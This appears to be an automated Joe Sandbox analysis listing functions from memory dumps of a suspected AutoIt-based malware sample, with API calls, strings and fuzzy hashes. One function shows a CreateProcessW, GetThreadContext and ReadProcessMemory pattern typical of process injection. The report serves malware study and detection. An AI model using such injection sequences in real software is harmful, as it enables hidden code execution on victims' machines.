Function 0007708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00074706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001352F8,?,000737AE,?), ref: 00074724

Part of subcall function 0009050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00077165), ref: 0009052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000771A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000AE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000AE909
RegCloseKey.ADVAPI32(?), ref: 000AE947
_wcscat.LIBCMT ref: 000AE9A0

Strings

\Include\, xrefs: 00077165
\, xrefs: 000AE9C3
Software\AutoIt v3\AutoIt, xrefs: 0007719E
Include, xrefs: 000AE8BF, 000AE900

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 8d3f8891c896d00940136089a54cc73618caa599aa448cb97e915c24ef6cfa57
Instruction ID: 0c8de5c004026bf5f571a90c25376e1cfcfdb45b92dcaccbaa56e8dfcee4a190
Opcode Fuzzy Hash: 8d3f8891c896d00940136089a54cc73618caa599aa448cb97e915c24ef6cfa57
Instruction Fuzzy Hash: 5B71BE71508301AEC700EF65EC819ABBBE8FF85350F41852EF549C71A1DB749988CB66

Function 00073A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00073A50
LoadCursorW.USER32(00000000,00007F00), ref: 00073A5F
LoadIconW.USER32(00000063), ref: 00073A76
LoadIconW.USER32(000000A4), ref: 00073A88
LoadIconW.USER32(000000A2), ref: 00073A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00073AC0
RegisterClassExW.USER32(?), ref: 00073B16

Part of subcall function 00073041: GetSysColorBrush.USER32(0000000F), ref: 00073074
Part of subcall function 00073041: RegisterClassExW.USER32(00000030), ref: 0007309E
Part of subcall function 00073041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000730AF
Part of subcall function 00073041: InitCommonControlsEx.COMCTL32(?), ref: 000730CC
Part of subcall function 00073041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000730DC
Part of subcall function 00073041: LoadIconW.USER32(000000A9), ref: 000730F2
Part of subcall function 00073041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00073101

Strings

AutoIt v3, xrefs: 00073B05
0, xrefs: 00073AF4
#, xrefs: 00073AFB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 0bb78a3f6a150334a5a92d9841e886e62aa4ce959677da993c8e8719b88649c7
Instruction ID: fca5a7b1c55f170d991575bf0a7b63ab04a33f81797f7a53d863cab9df05b787
Opcode Fuzzy Hash: 0bb78a3f6a150334a5a92d9841e886e62aa4ce959677da993c8e8719b88649c7
Instruction Fuzzy Hash: 91212D71D04305EFEF10DFA4EC49BAE7BB6FB08B11F10412AE504A66A2D3B95590DF94

Function 00073633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 000736D2
KillTimer.USER32(?,00000001), ref: 000736FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0007371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0007372A
CreatePopupMenu.USER32 ref: 0007373E
PostQuitMessage.USER32(00000000), ref: 0007374D

Strings

TaskbarCreated, xrefs: 00073725

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c694ab17ce2dfc64dbedfc8366b248744038401fe52ea271f24b718479a7da62
Instruction ID: 327e58a0bd9183420ca9081421e122a05ba9e09e702638c752d61f1e167c7a0f
Opcode Fuzzy Hash: c694ab17ce2dfc64dbedfc8366b248744038401fe52ea271f24b718479a7da62
Instruction Fuzzy Hash: 08415CB1A04509FBFB346F64DC09BBE3795EB41700F108525F506D66A2CB689E40F779

Function 00073766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 000737AE
CMDLINE, xrefs: 00073822
/AutoIt3OutputDebug, xrefs: 00073892
/ErrorStdOut, xrefs: 0007387D
/AutoIt3ExecuteLine, xrefs: 000738A7
/AutoIt3ExecuteScript, xrefs: 000738BC
CMDLINERAW, xrefs: 000737FB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: a56af76fbd58e639ec768e7c9d6c0a88573db22be20a79103848419fe02e87aa
Instruction ID: 004cf38697b7f822df537cb7cb191eed1a3e497af4c684178e01580b8370a9fb
Opcode Fuzzy Hash: a56af76fbd58e639ec768e7c9d6c0a88573db22be20a79103848419fe02e87aa
Instruction Fuzzy Hash: 9BA19C71D1021DAADF04EBA0CC95AFEB779BF14300F00802AF51AB7192DF785A08DBA5

Function 014B25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014B26C1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014B28E7

Memory Dump Source

Source File: 00000000.00000002.2197145327.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14b0000_25IvlOVEB1.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: 220962ab1bda5357323c7dfafd43bceca55db90aa73796d53b14aa21a2679f9d
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: CFA10874E00209EBDB14CFA4C894FEEBBB5BF48305F20855AE501BB291D7B5AA45CF64

Function 000739D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00073A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00073A24
ShowWindow.USER32(00000000,?,?), ref: 00073A38
ShowWindow.USER32(00000000,?,?), ref: 00073A41

Strings

AutoIt v3, xrefs: 000739FB, 00073A00, 00073A01
edit, xrefs: 00073A1E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 78637066f33dab99397ae29a804d98bbb85550c14d8b1ce5b7b9f02e8396e92b
Instruction ID: f80c97c3954c04c21293140213f5fd2d96fafb08411f29d68144938faee19d85
Opcode Fuzzy Hash: 78637066f33dab99397ae29a804d98bbb85550c14d8b1ce5b7b9f02e8396e92b
Instruction Fuzzy Hash: 64F05E70500294BEFB305727AC0CE3B3E7EDBC6F50F00002EBA00A2670C6751890DAB0

Function 014B23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 014B22A0: Sleep.KERNELBASE(000001F4), ref: 014B22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014B24DC

Strings

C0Y2649IVTROCFRBJP48S, xrefs: 014B253F, 014B2542

Memory Dump Source

Source File: 00000000.00000002.2197145327.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14b0000_25IvlOVEB1.jbxd

Similarity

API ID: CreateFileSleep
String ID: C0Y2649IVTROCFRBJP48S
API String ID: 2694422964-347813874
Opcode ID: abc73213c28170b774125cb3e7169430024a97ff536dc5443145ffd581bfa49d
Instruction ID: cb772445bdc56b3d86fef758ca97434c131945fb54f56429716599c8ac8f5ae8
Opcode Fuzzy Hash: abc73213c28170b774125cb3e7169430024a97ff536dc5443145ffd581bfa49d
Instruction Fuzzy Hash: C5518070D04258EBEF11DBA4D854BEFBBB8AF19300F004199E249BB2C1D6B91B45CBA5

Function 0007407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000AD3D7

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

_memset.LIBCMT ref: 000740FC
_wcscpy.LIBCMT ref: 00074150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00074160

Strings

Line: , xrefs: 000AD400

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: f9de80e93adda7645e8ec25bf6edbbf3ca29011c58bb1b8e36de98c5fcd81a9a
Instruction ID: 3999a62f414eefda6509e26b06122b97239ef5dfdeab52a2d53164d312934fbd
Opcode Fuzzy Hash: f9de80e93adda7645e8ec25bf6edbbf3ca29011c58bb1b8e36de98c5fcd81a9a
Instruction Fuzzy Hash: 1731B371808705AFD761EB60DC45FEB77D8AF44704F10891EF58D920A2EF789648C79A

Function 0009541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0009547B
_memcpy_s.LIBCMT ref: 000954ED
__read_nolock.LIBCMT ref: 0009554B
__filbuf.LIBCMT ref: 0009556E
_memset.LIBCMT ref: 000955B2

Part of subcall function 00098B28: __getptd_noexit.LIBCMT ref: 00098B28

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 18ade6b81e80b146f6c434e4b98de2dd03e9ba2969a11017dd3ec6091bbe9a05
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: E651F730A00F05DBCF669FAACC506AE77F2AF41326F248729F835962D2D7709D50AB40

Function 0007686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00074DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00074E0F

_free.LIBCMT ref: 000AE263
_free.LIBCMT ref: 000AE2AA

Part of subcall function 00076A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00076BAD

Strings

Bad directive syntax error, xrefs: 000AE292
>>>AUTOIT SCRIPT<<<, xrefs: 000AE039

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: e4b00b02e726ce2900bf3c55feb6d73cce7807402ced4bfebccaf0849b594f74
Instruction ID: 5e02f76294723b0d96ecfee1fb63ee1b806b1598dd07c1c0dbc4497ed974b592
Opcode Fuzzy Hash: e4b00b02e726ce2900bf3c55feb6d73cce7807402ced4bfebccaf0849b594f74
Instruction Fuzzy Hash: BE917D71D00259AFCF14EFA4CC819EDB7B8FF05310B10852AF81AAB2A2DB74AD45CB54

Function 000735B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000735A1,SwapMouseButtons,00000004,?), ref: 000735D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000735A1,SwapMouseButtons,00000004,?,?,?,?,00072754), ref: 000735F5
RegCloseKey.KERNELBASE(00000000,?,?,000735A1,SwapMouseButtons,00000004,?,?,?,?,00072754), ref: 00073617

Strings

Control Panel\Mouse, xrefs: 000735D2

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 8bbc32cf9783478690a5e19b0fd20fd456e98131aba796d82873981d4c1d22db
Instruction ID: d6b07c322d329ef3118c48a19dabebab4be3ea9f6ede5e22e6098c71a0f7dea4
Opcode Fuzzy Hash: 8bbc32cf9783478690a5e19b0fd20fd456e98131aba796d82873981d4c1d22db
Instruction Fuzzy Hash: 20111875911218BFEB208F64DC44DBFB7B8EF04740F11C569E809D7210E6759E50A768

Function 014B12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014B1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014B1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014B1B13

Memory Dump Source

Source File: 00000000.00000002.2197145327.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14b0000_25IvlOVEB1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 87337128114b512278a64b8cd04d062e1f67f32fe42d7bcfc8f5c67acb849352
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: 1F621E30A14258DBEB24CFA4D890BDEB376EF58700F1091A9D10DEB3A4E7759E81CB59

Function 000D955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00074EE5: _fseek.LIBCMT ref: 00074EFD

Part of subcall function 000D9734: _wcscmp.LIBCMT ref: 000D9824
Part of subcall function 000D9734: _wcscmp.LIBCMT ref: 000D9837

_free.LIBCMT ref: 000D96A2
_free.LIBCMT ref: 000D96A9
_free.LIBCMT ref: 000D9714

Part of subcall function 00092D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00099A24), ref: 00092D69
Part of subcall function 00092D55: GetLastError.KERNEL32(00000000,?,00099A24), ref: 00092D7B

_free.LIBCMT ref: 000D971C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 99d6c06c233ec92fe9fc1174e35969bf30f803f1a403c61ccf98500b1a9c1837
Instruction ID: 3b56568d59bc3a5b28f358e78726f63eadd0735d443d9e89360cf068e67a1eb7
Opcode Fuzzy Hash: 99d6c06c233ec92fe9fc1174e35969bf30f803f1a403c61ccf98500b1a9c1837
Instruction Fuzzy Hash: 7F5120B1D04258ABDF259F64DC81AEEBB79EF48300F1044AEF509A7352DB715A808F58

Function 0009470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000947A0
__flush.LIBCMT ref: 000947C0
__write.LIBCMT ref: 000947F3
__flsbuf.LIBCMT ref: 00094821

Part of subcall function 00098B28: __getptd_noexit.LIBCMT ref: 00098B28

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 3285716421cefdbb688ea89db24253d6a354fece40c8dd339364bb288d702194
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: FE41E974B0474AABDF28CEA9C880DAFB7E5EF46360B14857DE415C7650EB70DD42AB40

Function 00077285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000AEA39
GetOpenFileNameW.COMDLG32(?), ref: 000AEA83

Part of subcall function 00074750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00074743,?,?,000737AE,?), ref: 00074770

Part of subcall function 00090791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000907B0

Strings

X, xrefs: 000AEA51

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: f7db6ba0c1b8d82c7ba6e46e9638635c911cf33c95335ab70a3e933ba0fe455a
Instruction ID: 9062c0fcd52a672e08ee353e25c1e487d1e52891d089b07a2e6cd5590f8fc018
Opcode Fuzzy Hash: f7db6ba0c1b8d82c7ba6e46e9638635c911cf33c95335ab70a3e933ba0fe455a
Instruction Fuzzy Hash: B121A130E042589BCB519FD4D845BEE7BF8AF49710F008019E508BB242DBB85989CFA5

Function 000D8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000D8DAC
__fread_nolock.LIBCMT ref: 000D8DC1

Strings

EA06, xrefs: 000D8DF3

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 63d983f39cbab1c1e22ed8fd9fa24107742e9cb9a8a8f077f8dda849bf994a0c
Instruction ID: 23233703baa1f4e77d16ed22a03cb3d852e7685e6619781dada1a0a9e8b73c26
Opcode Fuzzy Hash: 63d983f39cbab1c1e22ed8fd9fa24107742e9cb9a8a8f077f8dda849bf994a0c
Instruction Fuzzy Hash: 6801F9718042187EDF28CAA8CC16EFE7BF8DB15301F00419BF552D22C1E974A6089760

Function 000D98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 000D98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000D990F

Strings

aut, xrefs: 000D9909

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: f6db833a63d72d3df088724b4eec6e0040a35f05dcb7eb1a111f5fa482da1dff
Instruction ID: ec6e7c072609809872d56cf6c5e73c444fa947799b7e15f2c559d30cf59e8673
